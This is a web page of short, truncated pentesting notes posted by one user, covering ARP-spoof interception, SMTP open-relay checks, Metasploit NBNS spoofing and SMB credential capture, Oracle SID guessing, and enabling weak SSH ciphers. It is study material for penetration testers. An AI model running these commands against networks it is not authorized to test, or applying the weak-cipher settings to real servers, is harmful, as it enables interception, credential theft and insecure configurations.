Latest notes for PenTesting- MrLeet

MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
By: ajayverma 2019-06-25 11:35:35

1) Flip your machine into forwarding mode (as root):
echo "1" > /proc/sys/net/ipv4/ip_forward

2) Setup iptables to intercept HTTP requests (as root):
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

3) -l 8080 -f lock.ico

4) Run arpspoof to redirect traffic to your machine (as...

Score: 0

By: ajayverma 2019-06-25 11:35:38

[+] SMTP Open Relay Commands

[-] ncat -C 25
[-] HELO
[-] MAIL FROM: <>
[-] RCPT TO: <>
[-] DATA
Test Email...

Score: 0

By: ajayverma 2019-06-25 11:35:41

[+] Weak SSH Ciphers

sudo nano /etc/ssh/sshd_config

Add the following lines:

Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,arcfour
MACs hmac-sha1,hmac-ripemd160

Restart SSH

[+] Unquoted Service Paths

Run Regedit and browse to HKLM\SYSTEM\CurrentControlSet\services
Find the service in question and simply add &...

Score: 0

By: ajayverma 2019-06-25 11:23:20

[+] NBNS Spoof / Capture

[>] NBNS Spoof
msf > use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > show options
msf auxiliary(nbns_response) > set INTERFACE eth0
msf auxiliary(nbns_response) > set SPOOFIP
msf auxiliary(nbns_response) > run

[>] SMB Capture

msf > use auxiliary/server/...

Score: 0

By: ajayverma 2019-06-25 11:23:24


root@bt:~# nbtscan -r
Doing NBT name scan for addresses from

IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------ Sendto failed: Permission denied <unknown> ...

Score: 0

By: ajayverma 2019-06-25 11:20:34

[+] Reminders


Metasploit - spool /home/<username>/console.log
Linux Terminal - script /home/<username>/Engagements/TestOutput.txt #Type exit to stop

Set IP address
ifconfig eth0

Set default gateway
route add default gw

Set DNS servers
echo "nameserver

Score: 0

By: ajayverma 2019-06-25 11:20:37

python.exe c:\Python27\PyInstaller-2.1\ --noconsole --onefile c:\Python27\PyInstaller-2.1\

[+] Generate the .spec file.
[+] Windows: (You want a single EXE file with your data in it, hence --onefile).

python --onefile

[+] Rebuild your package.

python your_main...

Score: 0

By: ajayverma 2019-06-25 11:20:41

The Checklist

[+] Information Gathering

Manually explore the site
Spider/crawl for missed or hidden content
Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store
Check the caches of major search engines for publicly accessible sites
Check for differences in content based on User Agent (eg, Mobile sites, access as...

Score: 0

By: ajayverma 2019-06-25 11:20:44

Tools within Kali:

root@kali:~# oscanner -s -P 1040

root@kali:~# sidguess -i -d /usr/share/wordlists/metasploit/unix_users.txt

root@kali:~# tnscmd10g version -h

nmap -p 1521 -A

Nmap nse scripts
Metasploit auxiliaries...

Score: 0

By: ajayverma 2019-06-25 11:20:48

[+] Setting up an Ethernet bridge in Ubuntu/Kali Linux

# Install bridge-utils
sudo apt-get install bridge-utils

# Disable network-manager + firewall

# Configuration

ifconfig eth0
ifconfig eth1
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 eth1
ifconfig br0 up
dhclient br0

sudo tcpdump -i br0...

Score: 0